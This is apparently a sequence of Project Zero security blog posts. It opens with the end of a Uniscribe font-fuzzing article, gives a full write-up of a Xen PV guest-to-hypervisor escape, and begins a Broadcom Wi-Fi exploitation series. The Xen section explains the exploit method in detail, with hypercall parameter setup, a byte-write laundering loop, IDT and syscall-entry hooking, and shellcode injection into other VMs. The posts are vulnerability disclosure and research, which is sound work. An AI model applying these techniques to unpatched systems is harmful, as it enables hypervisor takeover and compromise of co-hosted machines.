Gathering a solid corpus of input samples is arguably one of the most important parts of fuzzing preparation, especially if code coverage feedback is not involved, making it impossible for the corpus to gradually evolve into a more optimal form. We were lucky enough to already have several font corpora at our disposal from previous fuzzing runs. We decided to use the same set of files that had helped us discover 18 Windows kernel bugs in the past (see the “Preparing the input corpus” section of [4]). It was originally generated by running a corpus distillation algorithm over a large number of fonts crawled off the web, using an instrumented build of the FreeType2 open-source library, and consisted of 14848 TrueType and 4659 OpenType files, for a total of 2.4G of disk space. In order to tailor the corpus better for Uniscribe, we reduced it to just the files that contained at least one of the “GDEF”, “GSUB”, “GPOS”, “BASE” or “JSTF” tables, which are parsed by the library (a sketch of such a filter is shown below). This left us with 3768 TrueType and 2520 OpenType fonts consuming 1.68G on disk, which were much more likely to expose bugs in Uniscribe than any of the removed ones. That was the final corpus that we worked with.
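For illustration, a minimal sketch of such a filter follows. It assumes each candidate file is a plain sfnt container (offsets per the OpenType specification; TrueType collections would need extra handling), which is close to, but not necessarily identical to, the exact tooling we used:

#include <stddef.h>
#include <stdint.h>
#include <string.h>

static uint16_t rd16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

// Returns 1 if the font names at least one table that Uniscribe parses.
int font_touches_uniscribe(const uint8_t *data, size_t size) {
    static const char *tags[] = { "GDEF", "GSUB", "GPOS", "BASE", "JSTF" };
    if (size < 12)
        return 0;
    uint16_t num_tables = rd16(data + 4);        // numTables in the sfnt header
    for (uint16_t i = 0; i < num_tables; i++) {
        const uint8_t *rec = data + 12 + 16 * i; // 16-byte table records
        if (rec + 16 > data + size)
            break;
        for (unsigned t = 0; t < 5; t++)
            if (memcmp(rec, tags[t], 4) == 0)    // each record starts with the tag
                return 1;
    }
    return 0;
}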
The mutator configuration was also pretty similar to what we did for the kernel: we used the same five standard bitflipping, byteflipping, chunkspew, special ints and binary arithmetic algorithms with the precalculated per-table mutation ratio ranges. The only change made specifically for Uniscribe was to add mutations for the “BASE” and “JSTF” tables, which were previously not accounted for.
Last but not least, we extended the functionality of the guest fuzzing harness, which is responsible for invoking the tested font-related APIs (mostly displaying all of the font’s glyphs at various point sizes, but also querying a number of properties, etc.). While it was clear that some of the relevant code was executed automatically through user32!DrawText with no modifications required, we wanted to maximize the coverage of Uniscribe code as much as possible. A full reference of all its externally available functions can be found on MSDN [9]. After skimming through the documentation, we added calls to ScriptCacheGetHeight, ScriptGetFontProperties, ScriptGetCMap, ScriptGetFontAlternateGlyphs, ScriptSubstituteSingleGlyph and ScriptFreeCache. This quickly proved to be a successful idea, as it allowed us to discover the aforementioned generic bug in ScriptGetFontAlternateGlyphs. Furthermore, we decided to remove invocations of the GetKerningPairs and GetGlyphOutline API functions, as their corresponding logic is located in the kernel, while our focus had now shifted strictly to user mode. As such, they wouldn’t lead to the discovery of any new bugs in Uniscribe, but would instead slow the overall fuzzing process down. Apart from these minor modifications, the core of the test harness remained unchanged.
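A condensed sketch of the harness's per-font logic after these changes is shown below; the font path, face name and call parameters are illustrative assumptions rather than the harness's actual code, and error handling is elided:

#include <windows.h>
#include <usp10.h>

void test_one_font(const WCHAR *path) {
    // Register the mutated font for this process only.
    AddFontResourceExW(path, FR_PRIVATE, NULL);

    HDC hdc = CreateCompatibleDC(NULL);
    HFONT font = CreateFontW(32, 0, 0, 0, FW_NORMAL, FALSE, FALSE, FALSE,
                             DEFAULT_CHARSET, OUT_DEFAULT_PRECIS,
                             CLIP_DEFAULT_PRECIS, DEFAULT_QUALITY,
                             DEFAULT_PITCH, L"Fuzzed Font");  // placeholder name
    SelectObject(hdc, font);

    // Complex-script text routes DrawText through LPK into Uniscribe.
    WCHAR text[] = L"\x05D0\x05D1\x05D2";  // Hebrew letters
    RECT rc = { 0, 0, 1000, 1000 };
    DrawTextW(hdc, text, -1, &rc, DT_NOCLIP);

    // Newly added direct calls into the documented Uniscribe API.
    SCRIPT_CACHE cache = NULL;
    long height = 0;
    ScriptCacheGetHeight(hdc, &cache, &height);

    SCRIPT_FONTPROPERTIES props = { sizeof(props) };
    ScriptGetFontProperties(hdc, &cache, &props);

    WORD glyphs[8] = { 0 };
    ScriptGetCMap(hdc, &cache, text, 3, 0, glyphs);

    ScriptFreeCache(&cache);

    DeleteObject(font);
    DeleteDC(hdc);
    RemoveFontResourceExW(path, FR_PRIVATE, NULL);
}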
By taking the measures listed above, we hoped to trigger most of the low-hanging-fruit bugs. With this assumption, the only part left was to make sure that the crashes would be reliably caught and reported to the fuzzer. This subject is discussed in the next section.

Crash detection

The first step we took to detect Uniscribe crashes effectively was disabling Special Pools for win32k.sys and ATMFD.DLL (which caused unnecessary overhead for no gain in user-mode), while enabling the PageHeap option in Application Verifier for the harness process. This was done to improve our chances of detecting invalid memory accesses, and to make reproduction and deduplication more reliable.
Thanks to the fact that the fuzz-tested code in usp10.dll executed in the same context as the rest of the harness logic, we didn’t have to write a full-fledged Windows debugger to supervise another process. Instead, we just set up a top-level exception handler with the SetUnhandledExceptionFilter function, which then got called every time a fatal exception was generated in the process. The handler’s job was to send out the state of the crashing CPU context (passed in through ExceptionInfo->ContextRecord) to the hypervisor (i.e. the Bochs instrumentation) through the “debug print” hypercall, and then actually report that the crash occurred at the specific address.
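A minimal sketch of this setup is shown below; the two Hypercall* functions stand in for our Bochs hypercall interface and are hypothetical (the real transport is the instrumented emulator), and the harness is built as 32-bit x86, matching the crash dump above:

#include <windows.h>

// Hypothetical guest-to-host primitives backed by Bochs hypercalls.
void HypercallDebugPrint(const char *fmt, ...);
void HypercallCrashEncountered(DWORD address);

static LONG WINAPI CrashFilter(EXCEPTION_POINTERS *info) {
    CONTEXT *ctx = info->ContextRecord;

    // Ship the crashing CPU state to the host instrumentation for logging...
    HypercallDebugPrint("exception %08x at eip=%08x eax=%08x ecx=%08x",
                        info->ExceptionRecord->ExceptionCode,
                        ctx->Eip, ctx->Eax, ctx->Ecx);

    // ...then report the faulting address itself, for deduplication.
    HypercallCrashEncountered(ctx->Eip);

    return EXCEPTION_EXECUTE_HANDLER;  // terminate the harness afterwards
}

int main(void) {
    SetUnhandledExceptionFilter(CrashFilter);
    // ... load the mutated font and run the test cases here ...
    return 0;
}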
In the kernel font fuzzing scenario, crashes were detected by the Bochs instrumentation with the BX_INSTR_RESET instrumentation callback. This approach worked because the guest system was configured to automatically reboot on bugcheck, consequently triggering the bx_instr_reset handler. The easiest way to integrate this approach with user-mode fuzzing would therefore have been to just add an ExitWindowsEx call in the epilogue of the exception handler, making everything work out of the box without even touching the existing Bochs instrumentation. However, that method would have lost the information about the crash location, making automated deduplication impossible. In order to address this problem, we introduced a new “crash encountered” hypercall, which received the address of the faulting instruction as an argument from the guest, and passed this information further down our scalable fuzzing infrastructure. Having the crashes grouped by the exception address right from the start saved us a ton of postprocessing time, and limited the number of test cases we had to look at to a bare minimum.
This concludes the list of differences between the Windows kernel font fuzzing setup we’ve been using for nearly two years now and the equivalent user-mode setup, which we only built a few months ago but which has already proven very effective. Everything else has remained the same as described in the “font fuzzing techniques” article from last year [4].

Conclusions

It is a fascinating but dire realization that even for such a well-known class of bug hunting targets as font parsing implementations, it is still possible to discover new attack vectors dating back to the previous century, which have remained largely unaudited until now while being just as exposed as the interfaces we already know about. We believe that this is a great example of how gradually raising the bar for a variety of software can have much more impact than trying to kill every last bug in a narrow range of code. It also illustrates that time spent on thoroughly analyzing the attack surface and looking for little-known targets may turn out to be very fruitful, as the security community still doesn’t have a full understanding of the attack vectors in every important data processing stack (such as Windows font handling in this case).
This effort and its results show that fuzzing is a very universal technique, and most of its components can be easily reused from one target to another, especially within the scope of a single file format. Finally, it has proven that it is possible to fuzz not just the Windows kernel, but also regular user-mode code, regardless of the environment of the host system (which was Linux in our case). While the Bochs x86 emulator incurs a significant overhead compared to native execution speed, this can often be offset by scaling, still achieving a net gain in the number of iterations per second. As an interesting aside, issues #993 (Windows kernel registry hive loading), #1042 (EMF+ processing in GDI+), #1052 and #1054 (color profile processing) fixed in the last Patch Tuesday were also found by fuzzing Windows on Bochs, but with slightly different input samples, test harnesses and mutation strategies. :)

References
  1. The “One font vulnerability to rule them all” series starting with https://googleprojectzero.blogspot.com/2015/07/one-font-vulnerability-to-rule-them-all.html
  2. https://googleprojectzero.blogspot.com/2015/09/enabling-qr-codes-in-internet-explorer.html
  3. https://googleprojectzero.blogspot.com/2016/06/a-year-of-windows-kernel-font-fuzzing-1_27.html
  4. https://googleprojectzero.blogspot.com/2016/07/a-year-of-windows-kernel-font-fuzzing-2.html
  5. https://bugs.chromium.org/p/project-zero/issues/list?can=1&q=product%3Auniscribe+fixed%3A2017-mar-14
  6. http://blogs.flexerasoftware.com/secunia-research/2016/12/microsoft_windows_loaduvstable_heap_based_buffer_overflow_vulnerability.html
  7. https://msdn.microsoft.com/pl-pl/library/windows/desktop/dd374091(v=vs.85).aspx
  8. https://msdn.microsoft.com/pl-pl/library/windows/desktop/dd162498%28v=vs.85%29.aspx
  9. https://msdn.microsoft.com/pl-pl/library/windows/desktop/dd374093(v=vs.85).aspx
Categories: Security

Pandavirtualization: Exploiting the Xen hypervisor

Fri, 04/07/2017 - 09:20
Posted by Jann Horn, Project Zero
On 2017-03-14, I reported a bug to Xen's security team that permits an attacker with control over the kernel of a paravirtualized x86-64 Xen guest to break out of the hypervisor and gain full control over the machine's physical memory. The Xen Project publicly released an advisory and a patch for this issue on 2017-04-04.
To demonstrate the impact of the issue, I created an exploit that, when executed in one 64-bit PV guest with root privileges, will execute a shell command as root in all other 64-bit PV guests (including dom0) on the same physical machine.

Background

access_ok()

On x86-64, Xen PV guests share the virtual address space with the hypervisor. The coarse memory layout looks as follows:

Xen allows the guest kernel to perform hypercalls, which are essentially normal system calls from the guest kernel to the hypervisor using the System V AMD64 ABI. They are performed using the syscall instruction, with up to six arguments passed in registers. Like normal syscalls, Xen hypercalls often take guest pointers as arguments. Because the hypervisor shares its address space, it makes sense for guests to simply pass in guest-virtual pointers.
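For illustration, a two-argument hypercall wrapper in the guest kernel might look roughly like this; it is a simplification, since real guests normally jump through a Xen-provided hypercall page rather than inlining the syscall instruction:

// Hypercall number in rax, arguments in rdi/rsi (System V AMD64 style);
// the syscall instruction itself clobbers rcx and r11.
static inline long hypercall2(unsigned long nr, unsigned long a1,
                              unsigned long a2)
{
    long ret;
    asm volatile("syscall"
                 : "=a"(ret)
                 : "a"(nr), "D"(a1), "S"(a2)
                 : "rcx", "r11", "memory");
    return ret;
}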
Like any kernel, Xen has to ensure that guest-virtual pointers don't actually point to hypervisor-owned memory before dereferencing them. It does this using userspace accessors that are similar to those in the Linux kernel; for example:
  • access_ok(addr, size) for checking whether a guest-supplied virtual memory range is safe to access - in other words, it checks that accessing the memory range will not modify hypervisor memory
  • __copy_to_guest(hnd, ptr, nr) for copying nr bytes from the hypervisor address ptr to the guest address hnd without checking whether hnd is safe
  • copy_to_guest(hnd, ptr, nr) for copying nr bytes from the hypervisor address ptr to the guest address hnd if hnd is safe

In the Linux kernel, the macro access_ok() checks whether the whole memory range from addr to addr+size-1 is safe to access, using any memory access pattern. However, Xen's access_ok() doesn't guarantee that much:
/*
 * Valid if in +ve half of 48-bit address space, or above Xen-reserved area.
 * This is also valid for range checks (addr, addr+size). As long as the
 * start address is outside the Xen-reserved area then we will access a
 * non-canonical address (and thus fault) before ever reaching VIRT_START.
 */
#define __addr_ok(addr) \
    (((unsigned long)(addr) < (1UL<<47)) || \
     ((unsigned long)(addr) >= HYPERVISOR_VIRT_END))

#define access_ok(addr, size) \
    (__addr_ok(addr) || is_compat_arg_xlat_range(addr, size))
Xen normally only checks that addr points into the userspace area or the kernel area without checking size. If the actual guest memory access starts roughly at addr, proceeds linearly without skipping gigantic amounts of memory and bails out as soon as a guest memory access fails, only checking addr is sufficient because of the large range of non-canonical addresses, which serve as a large guard area. However, if a hypercall wants to access a guest buffer starting at a 64-bit offset, it needs to ensure that the access_ok() check is performed using the correct offset - checking the whole userspace buffer is unsafe!
Xen provides wrappers around access_ok() for accessing arrays in guest memory. If you want to check whether it's safe to access an array starting at element 0, you can use guest_handle_okay(hnd, nr). However, if you want to check whether it's safe to access an array starting at a different element, you need to use guest_handle_subrange_okay(hnd, first, last).
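Put as a sketch, a hypothetical hypercall handler that accesses a guest array at a resumable offset has to pick the second form; the check macros are Xen's, while the handler itself is made up:

static int access_guest_array(XEN_GUEST_HANDLE_PARAM(xen_pfn_t) hnd,
                              unsigned long nr_entries,
                              unsigned long first, unsigned long last)
{
    /* Only proves safety for an access starting at element 0: */
    if ( !guest_handle_okay(hnd, nr_entries) )
        return -EFAULT;

    /*
     * For an access resuming at a guest-controlled element offset, the
     * actual subrange must be validated; a check anchored at element 0
     * says nothing about elements [first, last].
     */
    if ( !guest_handle_subrange_okay(hnd, first, last) )
        return -EFAULT;

    /* ... e.g. __copy_to_guest_offset(hnd, first, ...) ... */
    return 0;
}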
When I saw the definition of access_ok(), the weakness of the security guarantees it actually provides seemed rather unintuitive to me, so I started searching for its callers, wondering whether anyone might be using it in an unsafe way.

Hypercall Preemption

When, e.g., a scheduler tick happens, Xen needs to be able to quickly switch from the currently executing vCPU to another VM's vCPU. However, simply interrupting the execution of a hypercall won't work (e.g. because the hypercall could be holding a spinlock), so Xen (like other operating systems) needs some mechanism to delay the vCPU switch until it's safe to do so.
In Xen, hypercalls are preempted using voluntary preemption: any long-running hypercall code is expected to regularly call hypercall_preempt_check() to check whether the scheduler wants to run another vCPU. If it does, the hypercall code adjusts the hypercall arguments (in guest registers or guest memory) so that, as soon as the current vCPU is scheduled again, it will re-enter the hypercall and perform the remaining work, and then exits to the guest, thereby signalling to the scheduler that it's safe to preempt the currently-running task. Hypercalls don't distinguish between normal hypercall entry and hypercall re-entry after preemption.
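Schematically, a long-running hypercall body follows roughly the pattern below; the loop is hypothetical, while hypercall_preempt_check() and hypercall_create_continuation() are real Xen primitives:

static long process_extents(unsigned long start, unsigned long nr_items,
                            unsigned int cmd, void *arg)
{
    long rc = 0;
    for ( unsigned long i = start; i < nr_items; i++ )
    {
        if ( i != start && hypercall_preempt_check() )
        {
            /*
             * Stash the progress in guest-visible state (registers or
             * guest memory) and arrange for re-entry; the next invocation
             * recovers `start` from that state.
             */
            rc = hypercall_create_continuation(__HYPERVISOR_memory_op,
                                               "lh", cmd, arg);
            break;
        }
        /* ... process item i ... */
    }
    return rc;
}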
This hypercall re-entry mechanism is used in Xen because Xen does not have one hypervisor stack per vCPU; it only has one hypervisor stack per physical core. This means that while other operating systems (e.g. Linux) can simply leave the state of an interrupted syscall on the kernel stack, Xen can't do that as easily.
This design means that for some hypercalls, to allow them to properly resume their work, additional data is stored in guest memory that could potentially be manipulated by the guest to attack the hypervisor.

memory_exchange()

The hypercall HYPERVISOR_memory_op(XENMEM_exchange, arg) invokes the function memory_exchange(arg) in xen/common/memory.c. This function allows a guest to "trade in" a list of physical pages that are currently assigned to the guest in exchange for new physical pages with different restrictions on their physical contiguity. This is useful for guests that want to perform DMA, because DMA requires physically contiguous buffers.
The hypercall takes a struct xen_memory_exchange as argument, which is defined as follows:
struct xen_memory_reservation {
    /* [...] */
    XEN_GUEST_HANDLE(xen_pfn_t) extent_start; /* in: physical page list */

    /* Number of extents, and size/alignment of each (2^extent_order pages). */
    xen_ulong_t    nr_extents;
    unsigned int   extent_order;

    /* XENMEMF flags. */
    unsigned int   mem_flags;

    /*
     * Domain whose reservation is being changed.
     * Unprivileged domains can specify only DOMID_SELF.
     */
    domid_t        domid;
};

struct xen_memory_exchange {
    /*
     * [IN] Details of memory extents to be exchanged (GMFN bases).
     * Note that @in.address_bits is ignored and unused.
     */
    struct xen_memory_reservation in;

    /*
     * [IN/OUT] Details of new memory extents.
     * We require that:
     *  1. @in.domid == @out.domid
     *  2. @in.nr_extents  << @in.extent_order ==
     *     @out.nr_extents << @out.extent_order
     *  3. @in.extent_start and @out.extent_start lists must not overlap
     *  4. @out.extent_start lists GPFN bases to be populated
     *  5. @out.extent_start is overwritten with allocated GMFN bases
     */
    struct xen_memory_reservation out;

    /*
     * [OUT] Number of input extents that were successfully exchanged:
     *  1. The first @nr_exchanged input extents were successfully
     *     deallocated.
     *  2. The corresponding first entries in the output extent list correctly
     *     indicate the GMFNs that were successfully exchanged.
     *  3. All other input and output extents are untouched.
     *  4. If not all input extents are exchanged then the return code of this
     *     command will be non-zero.
     *  5. THIS FIELD MUST BE INITIALISED TO ZERO BY THE CALLER!
     */
    xen_ulong_t nr_exchanged;
};
The fields that are relevant for the bug are in.extent_start, in.nr_extents, out.extent_start, out.nr_extents and nr_exchanged.
nr_exchanged is documented as always being initialized to zero by the guest - this is because it is not only used to return a result value, but also for hypercall preemption. When memory_exchange() is preempted, it stores its progress in nr_exchanged, and the next execution of memory_exchange() uses the value of nr_exchanged to decide at which point in the input arrays in.extent_start and out.extent_start it should resume.
Originally, memory_exchange() did not check the userspace array pointers at all before accessing them with __copy_from_guest_offset() and __copy_to_guest_offset(), which do not perform any checks themselves - so by supplying hypervisor pointers, it was possible to cause Xen to read from and write to hypervisor memory - a pretty severe bug. This was discovered in 2012 (XSA-29, CVE-2012-5513) and fixed as follows (https://xenbits.xen.org/xsa/xsa29-4.1.patch):
diff --git a/xen/common/memory.c b/xen/common/memory.c
index 4e7c234..59379d3 100644
--- a/xen/common/memory.c
+++ b/xen/common/memory.c
@@ -289,6 +289,13 @@ static long memory_exchange(XEN_GUEST_HANDLE(xen_memory_exchange_t) arg)
         goto fail_early;
     }
 
+    if ( !guest_handle_okay(exch.in.extent_start, exch.in.nr_extents) ||
+         !guest_handle_okay(exch.out.extent_start, exch.out.nr_extents) )
+    {
+        rc = -EFAULT;
+        goto fail_early;
+    }
+
     /* Only privileged guests can allocate multi-page contiguous extents. */
     if ( !multipage_allocation_permitted(current->domain,
                                          exch.in.extent_order) ||

The bug

As can be seen in the following code snippet, the 64-bit resumption offset nr_exchanged, which can be controlled by the guest because of Xen's hypercall resumption scheme, can be used by the guest to choose an offset from out.extent_start at which the hypervisor should write:
static long memory_exchange(XEN_GUEST_HANDLE_PARAM(xen_memory_exchange_t) arg)
{
    [...]

    /* Various sanity checks. */
    [...]

    if ( !guest_handle_okay(exch.in.extent_start, exch.in.nr_extents) ||
         !guest_handle_okay(exch.out.extent_start, exch.out.nr_extents) )
    {
        rc = -EFAULT;
        goto fail_early;
    }

    [...]

    for ( i = (exch.nr_exchanged >> in_chunk_order);
          i < (exch.in.nr_extents >> in_chunk_order);
          i++ )
    {
        [...]
        /* Assign each output page to the domain. */
        for ( j = 0; (page = page_list_remove_head(&out_chunk_list)); ++j )
        {
            [...]
            if ( !paging_mode_translate(d) )
            {
                [...]
                if ( __copy_to_guest_offset(exch.out.extent_start,
                                            (i << out_chunk_order) + j,
                                            &mfn, 1) )
                    rc = -EFAULT;
            }
        }
        [...]
    }
    [...]
}
However, the guest_handle_okay() check only checks whether it would be safe to access the guest array exch.out.extent_start starting at offset 0; guest_handle_subrange_okay() would have been correct. This means that an attacker can write an 8-byte value to an arbitrary address in hypervisor memory by choosing the following parameters (a hedged sketch of the resulting hypercall setup follows the list):
  • exch.in.extent_order and exch.out.extent_order as 0 (exchanging page-sized blocks of physical memory for new page-sized blocks)
  • exch.out.extent_start and exch.nr_exchanged so that exch.out.extent_start points to userspace memory while exch.out.extent_start+8*exch.nr_exchanged points to the target address in hypervisor memory, with exch.out.extent_start close to NULL; this can be calculated as exch.out.extent_start=target_addr%8, exch.nr_exchanged=target_addr/8.
  • exch.in.nr_extents and exch.out.nr_extents as exch.nr_exchanged+1
  • exch.in.extent_start as input_buffer-8*exch.nr_exchanged (where input_buffer is a legitimate guest kernel pointer to a physical page number that is currently owned by the guest). This is guaranteed to always point to the guest userspace range (and therefore pass the access_ok() check) because exch.out.extent_start roughly points to the start of the userspace address range and the hypervisor and guest kernel address ranges together are only as big as the userspace address range.
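Guest-kernel code assembling such a hypercall might look roughly like the sketch below; set_xen_guest_handle_raw(), the structure layout and HYPERVISOR_memory_op() come from Xen's public/guest headers, while the function itself is hypothetical:

#include <stdint.h>
#include <string.h>

// Write one (mostly uncontrolled) physical page number to target_addr in
// hypervisor memory by abusing nr_exchanged as a 64-bit element offset.
// in_pfn must point to a physical page number currently owned by the guest.
static long oob_write_pfn(uint64_t target_addr, xen_pfn_t *in_pfn)
{
    struct xen_memory_exchange exch;
    memset(&exch, 0, sizeof(exch));

    exch.nr_exchanged = target_addr / 8;          // the "resumption" offset
    set_xen_guest_handle_raw(exch.out.extent_start,
                             (xen_pfn_t *)(uintptr_t)(target_addr % 8));
    set_xen_guest_handle_raw(exch.in.extent_start,
                             (xen_pfn_t *)((uint8_t *)in_pfn -
                                           8 * exch.nr_exchanged));
    exch.in.nr_extents    = exch.nr_exchanged + 1;
    exch.out.nr_extents   = exch.nr_exchanged + 1;
    exch.in.extent_order  = exch.out.extent_order = 0;
    exch.in.domid         = exch.out.domid = DOMID_SELF;

    // out.extent_start + 8 * nr_exchanged == target_addr, so the hypervisor
    // performs the out-of-bounds write when it "resumes" the exchange.
    return HYPERVISOR_memory_op(XENMEM_exchange, &exch);
}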

The value that is written to the attacker-controlled address is a physical page number (the physical address divided by the page size).

Exploiting the bug: Gaining pagetable control

Especially on a busy system, controlling the page numbers that are written by the hypervisor might be difficult. Therefore, for reliable exploitation, it makes sense to treat the bug as a primitive that permits repeatedly writing 8-byte values at controlled addresses, with the most significant bits being zeroes (because of the limited amount of physical memory) and the least significant bits being more or less random. For my exploit, I decided to treat this primitive as one that writes an essentially random byte followed by seven bytes of garbage.
It turns out that for an x86-64 PV guest, such a primitive is sufficient for reliably exploiting the hypervisor for the following reasons:
  • x86-64 PV guests know the real physical page numbers of all pages they can access
  • x86-64 PV guests can map live pagetables (from all four paging levels) belonging to their domain as readonly; Xen only prevents mapping them as writable
  • Xen maps all physical memory as writable at 0xffff830000000000 (in other words, the hypervisor can write to any physical page, independent of the protections using which it is mapped in other places, by writing to physical_address+0xffff830000000000).

The goal of the attack is to point an entry in a live level 3 pagetable (which I'll call "victim pagetable") to a page to which the guest has write access (which I'll call "fake pagetable"). This means that the attacker has to write an 8-byte value, containing the physical page number of the fake pagetable and some flags, into an entry in the victim pagetable, and ensure that the following 8-byte pagetable entry stays disabled (e.g. by setting the first byte of the following entry to zero). Essentially, the attacker has to write 9 controlled bytes followed by 7 bytes that don't matter.
Because the physical page numbers of all relevant pages and the address of the writable mapping of all physical memory are known to the guest, figuring out where to write and what value to write is easy, so the only remaining problem is how to use the primitive to actually write data.
Because the attacker wants to use the primitive to write to a readable page, the "write one random byte followed by 7 bytes of garbage" primitive can easily be converted to a "write one controlled byte followed by 7 bytes of garbage" primitive by repeatedly writing a random byte and reading it back until the value is right. Then, the "write one controlled byte followed by 7 bytes of garbage" primitive can be converted to a "write controlled data followed by 7 bytes of garbage" primitive by writing bytes to consecutive addresses - and that's exactly the primitive needed for the attack.
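A sketch of that laundering loop, with the two underlying primitives left hypothetical (write_random_qword() stands for one trigger of the memory_exchange() bug, and read_byte() goes through the guest's readonly alias of the victim page):

#include <stddef.h>
#include <stdint.h>

void write_random_qword(volatile uint8_t *hv_addr);        // one bug trigger
uint8_t read_byte(const volatile uint8_t *readonly_alias); // guest-side read

// Fix up bytes from low to high addresses: the 7 garbage bytes written at
// target[i+1..i+7] are overwritten by later iterations, so only the final
// 7 trailing bytes remain garbage.
void write_controlled_bytes(volatile uint8_t *target,
                            const volatile uint8_t *alias,
                            const uint8_t *data, size_t len)
{
    for (size_t i = 0; i < len; i++) {
        do {
            write_random_qword(target + i);
        } while (read_byte(alias + i) != data[i]);
    }
}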
At this point, the attacker can control a live pagetable, which allows them to map arbitrary physical memory into the guest's virtual address space. This means that the attacker can reliably read from and write to the memory, both code and data, of the hypervisor and of all other VMs on the system.

Running shell commands in other VMs

At this point, the attacker has full control over the machine, equivalent to the privilege level of the hypervisor, and can easily steal secrets by searching through physical memory; a realistic attacker probably wouldn't want to inject code into VMs anyway, considering how much more detectable that makes an attack.
But running an arbitrary shell command in other VMs makes the severity more obvious (and it looks cooler), so for fun, I decided to continue my exploit so that it injects a shell command into all other 64-bit PV domains.
As a first step, I wanted to reliably gain code execution in hypervisor context. Given the ability to read and write physical memory, one relatively OS- (or hypervisor-)independent way to call an arbitrary address with kernel/hypervisor privileges is to locate the Interrupt Descriptor Table using the unprivileged SIDT instruction, write an IDT entry with DPL 3 and raise the interrupt. (Intel's upcoming Cannon Lake CPUs are apparently going to support User-Mode Instruction Prevention (UMIP), which will finally make SIDT a privileged instruction.) Xen supports SMEP and SMAP, so it isn't possible to just point the IDT entry at guest memory, but using the ability to write pagetable entries, it is possible to map a guest-owned page with hypervisor-context shellcode as non-user-accessible, which allows it to run despite SMEP.
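Locating the IDT really is a one-instruction affair; a minimal sketch:

#include <stdint.h>

struct __attribute__((packed)) idtr {
    uint16_t limit;
    uint64_t base;
};

// SIDT is unprivileged on today's CPUs, so even deprivileged code can learn
// the virtual address of the hypervisor's Interrupt Descriptor Table.
static uint64_t read_idt_base(void)
{
    struct idtr idtr;
    asm volatile("sidt %0" : "=m"(idtr));
    return idtr.base;
}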
Then, in hypervisor context, it is possible to hook the syscall entry point by reading and writing the IA32_LSTAR MSR. The syscall entry point is used both for syscalls from guest userspace and for hypercalls from guest kernels. By mapping an attacker-controlled page into guest-user-accessible memory, changing the register state and invoking sysret, it is possible to divert the execution of guest userspace code to arbitrary guest user shellcode, independent of the hypervisor or the guest operating system.
My exploit injects shellcode into all guest userspace processes that is invoked on every write() syscall. Whenever the shellcode runs, it checks whether it is running with root privileges and whether a lockfile doesn't exist in the guest's filesystem yet. If these conditions are fulfilled, it uses the clone() syscall to create a child process that runs an arbitrary shell command.
(Note: My exploit doesn't clean up after itself on purpose, so when the attacking domain is shut down later, the hooked entry point will quickly cause the hypervisor to crash.)
Here is a screenshot of a successful attack against Qubes OS 3.2, which uses Xen as its hypervisor. The exploit is executed in the unprivileged domain "test124"; the screenshot shows that it injects code into dom0 and the firewallvm:

Conclusion

I believe that the root cause of this issue was the weak security guarantees made by access_ok(). The current version of access_ok() was committed in 2005, two years after the first public release of Xen and long before the first XSA was released. It seems like old code tends to contain relatively straightforward weaknesses more often than newer code, because it was committed with less scrutiny regarding security issues, and such old code is then often left alone.
When security-relevant code is optimized based on assumptions, care must be taken to reliably prevent those assumptions from being violated. access_ok() actually used to check whether the whole range overlaps hypervisor memory, which would have prevented this bug from occurring. Unfortunately, in 2005, a commit with "x86_64 fixes/cleanups" was made that changed the behavior of access_ok() on x86_64 to the current one. As far as I can tell, the only reason this didn't immediately make the MEMOP_increase_reservation and MEMOP_decrease_reservation hypercalls vulnerable is that the nr_extents argument of do_dom_mem_op() was only 32 bits wide - a relatively brittle defense.
While there have been several Xen vulnerabilities that only affected PV guests because the issues were in code that is unnecessary when dealing with HVM guests, I believe that this isn't one of them. Accessing guest virtual memory is much more straightforward for PV guests than for HVM guests: For PV guests, raw_copy_from_guest() calls copy_from_user(), which basically just does a bounds check followed by a memcpy with pagefault fixup - the same thing normal operating system kernels do when accessing userspace memory. For HVM guests, raw_copy_from_guest() calls copy_from_user_hvm(), which has to do a page-wise copy (because the memory area might be physically non-contiguous and the hypervisor doesn't have a contiguous virtual mapping of it) with guest pagetable walks (to translate guest virtual addresses to guest physical addresses) and guest frame lookups for every page, including reference counting, mapping guest pages into hypervisor memory and various checks to e.g. prevent HVM guests from writing to readonly grant mappings. So for HVM, the complexity of handling guest memory accesses is actually higher than for PV.
For security researchers, I think that a lesson from this is that paravirtualization is not much harder to understand than normal kernels. If you've audited kernel code before, the hypercall entry path (lstar_enter and int80_direct_trap in xen/arch/x86/x86_64/entry.S) and the basic design of hypercall handlers (for x86 PV: listed in the pv_hypercall_table in xen/arch/x86/pv/hypercall.c) should look more or less like normal syscalls.

Categories: Security

Over The Air: Exploiting Broadcom’s Wi-Fi Stack (Part 1)

Tue, 04/04/2017 - 11:51
Posted by Gal Beniamini, Project Zero
It’s a well understood fact that platform security is an integral part of the security of complex systems. For mobile devices, this statement rings even truer; modern mobile platforms include multiple processing units, all elaborately communicating with one another. While the code running on the application processor (AP) has been the subject of much research, other components have seldom received the same scrutiny.

Over the years, as a result of the focused attention by security folk, the defenses of code running on the application processor have been reinforced. Taking Android as a case study, this includes hardening the operating system, improving the security of applications, and introducing incremental security enhancements affecting the entire system. All positive improvements, no doubt. However, attackers tend to follow the path of least resistance. Improving the security of one component will inevitably cause some attackers to start looking elsewhere for an easier point of entry.
In this two-part blog series, we’ll explore the exposed attack surface introduced by Broadcom’s Wi-Fi SoC on mobile devices. Specifically, we’ll focus our attention on devices running Android, although a vast amount of this research applies to other systems including the same Wi-Fi SoCs. The first blog post will focus on exploring the Wi-Fi SoC itself; we’ll discover and exploit vulnerabilities which will allow us to remotely gain code execution on the chip. In the second blog post, we’ll further elevate our privileges from the SoC into the operating system’s kernel. Chaining the two together, we’ll demonstrate full device takeover by Wi-Fi proximity alone, requiring no user interaction.
We’ll focus on Broadcom’s Wi-Fi SoCs since they are the most common Wi-Fi chipset used on mobile devices. A partial list of devices which make use of this platform includes the Nexus 5, 6 and 6P, most Samsung flagship devices, and all iPhones since the iPhone 4. For the purpose of this blog post, we’ll demonstrate a Wi-Fi remote code execution exploit on a fully updated (at the time) Nexus 6P, running Android 7.1.1 version NUF26K.
All the vulnerabilities in the post have been disclosed to Broadcom. Broadcom has been incredibly responsive and helpful, both in fixing the vulnerabilities and making the fixes available to affected vendors. For a complete timeline, see the bug tracker entries. They’ve also been very open to discussions relating to the security of the Wi-Fi SoC.
I would like to thank Thomas Dullien (@halvarflake) for helping boot up the research, for the productive brainstorming, and for helping search the literature for any relevant clues. I’d also like to thank my colleagues in the London office for helping make sense of the exploitation constraints, and for listening to my ramblings.

Why-Fi?
